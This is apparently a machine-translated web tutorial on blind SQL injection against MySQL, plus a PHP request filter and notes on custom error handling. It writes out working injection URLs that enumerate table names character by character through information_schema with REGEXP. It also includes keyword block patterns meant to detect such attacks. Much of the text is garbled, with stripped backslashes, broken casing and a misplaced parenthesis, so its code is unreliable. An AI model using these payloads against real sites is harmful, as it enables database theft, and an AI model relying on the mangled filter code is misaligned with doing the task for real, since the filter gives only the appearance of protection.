As we all know, all the library names are stored in the INFORMATION_SCHEMA library in the MySQL 5+, indicating the field name information. So the attack mode is as follows:
1. Determine whether the first character of the first table name is a A-Z character, where Blind_sqli is assumed to be a known library name.
Note: ^[a-z] In the regular expression indicates that the start character in the string is in a-Z range
| The code is as follows | |
Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a- Z] ' LIMIT 0,1)/* |
2. Determine whether the first character is a character in A-n
| The code is as follows | |
Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a- N] ' LIMIT 0,1)/* |
3. Determines that the character is n
| The code is as follows | |
Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^n ') LIMIT 0,1)/* www.111cn.net |
4. The change of expression is as follows
| The code is as follows | |
Expression like this: ' ^n[a-z] '-> ' ^ne[a-z] '-> ' ^new[a-z] '-> ' ^news[a-z ' '-> FALSE |
This means that the table name is news, to verify that the regular expression is ' ^news$ ', but it is not necessary to directly judge table_name = ' news '.
5. Next guess the other table just need to modify the limit 1,1-> limit 2,1 the next table can be blind.
Cases
| The code is as follows | |
$Exec _commond = "(s| S) * (EXEC (s|+) + (s|x) pw+) (s| S) * "; |
SQL Attack code
| The code is as follows | |
| <?php function Customerror ($errno, $errstr, $errfile, $errline) { echo "<b>error number:</b> [$errno],error on line $errline in $errfile <br/>"; die (); } Set_error_handler ("Customerror", e_error); $getfilter = "' | (And|or) b.+? (>|<|=|in|like) |/*.+?*/|<s*scriptb|bexecb| Union.+? Select| Update.+? Set| Inserts+into.+? values| (select| DELETE). +? From| (create| alter| drop| TRUNCATE) s+ (table| DATABASE) "; $postfilter = "B (and|or) b.{1,6}?" (=|>|<|BINB|BLIKEB) |/*.+?*/|<s*scriptb|bexecb| Union.+? Select| Update.+? Set| Inserts+into.+? values| (select| DELETE). +? From| (create| alter| drop| TRUNCATE) s+ (table| DATABASE) "; $cookiefilter = "B (and|or) b.{1,6}?" (=|>|<|BINB|BLIKEB) |/*.+?*/|<s*scriptb|bexecb| Union.+? Select| Update.+? Set| Inserts+into.+? values| (select| DELETE). +? From| (create| alter| drop| TRUNCATE) s+ (table| DATABASE) "; function Stopattack ($StrFiltKey, $StrFiltValue, $ArrFiltReq) { if (Is_array ($StrFiltValue)) { $StrFiltValue =implode ($StrFiltValue); } if (Preg_match ("/". $ArrFiltReq. " /is ", $StrFiltValue) ==1&&!isset ($_request[' SecurityToken ')) { Slog ("<br><br> Operation IP:". $_server["REMOTE_ADDR"]. " <br> operation time: ". Strftime ("%y-%m-%d%h:%m:%s ")." <br> Action page: ". $_server[" Php_self "]." <br> Submission Method: ". $_server[" Request_method "." <br> Submit parameters: ". $StrFiltKey." <br> submit data: ". $StrFiltValue); print "result Notice:illegal operation!"; exit (); } } foreach ($_get as $key => $value) { Stopattack ($key, $value, $getfilter); } foreach ($_post as $key => $value) { Stopattack ($key, $value, $postfilter); } foreach ($_cookie as $key => $value) { Stopattack ($key, $value, $cookiefilter); } function Slog ($logs) { $toppath = "log.htm"; $Ts =fopen ($toppath, "A +"); fputs ($Ts, $logs. " RN "); fclose ($Ts); } ?> |
Sql
Analysis
If you use this function, this function will bypass the standard error handling of PHP, so that you define the error handler (Die ()).
Secondly, if the code has been wrong before the execution, the user-defined program has not been executed, so the user will not be used to write the error processing program.
Then, PHP has a set of error handling mechanism, you can use Set_error_handler () to take over PHP error handling, you can use the Trigger_error () function to actively throw an error.
The Set_error_handler () function sets the user-defined error-handling function. function is used to create the user's own error handling method for the runtime. It needs to first create an error-handling function and then set the error level.
About the usage:
| The code is as follows | |
function Customerror ($errno, $errstr, $errfile, $errline) { echo "<b> error code:</b> [${errno}] ${errstr}\r\n"; Echo Error line: {$errline} file {$errfile}\r\n; 9 echo "PHP version", Php_version, "(", Php_os, ") \ r \ n"; Die (); } Set_error_handler ("Customerror", e_all| E_STRICT); |
Summarize
When PHP encounters an error, it gives the location, number of rows, and reasons for the error script, and many people say it's not a big deal. But the consequences of revealing the actual path are unthinkable, and for some intruders, this information is very important, and in fact there are many servers that are now in question. Some network management simply put the PHP configuration file display_errors set to off to solve, but I think this method is too negative. There are times when we really need PHP to return the wrong information for debugging. And you may need to give the user an account when you make an error, or even navigate to another page. But with the Set_error_handler (), these contradictions can also be resolved.
But this function is rarely used.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
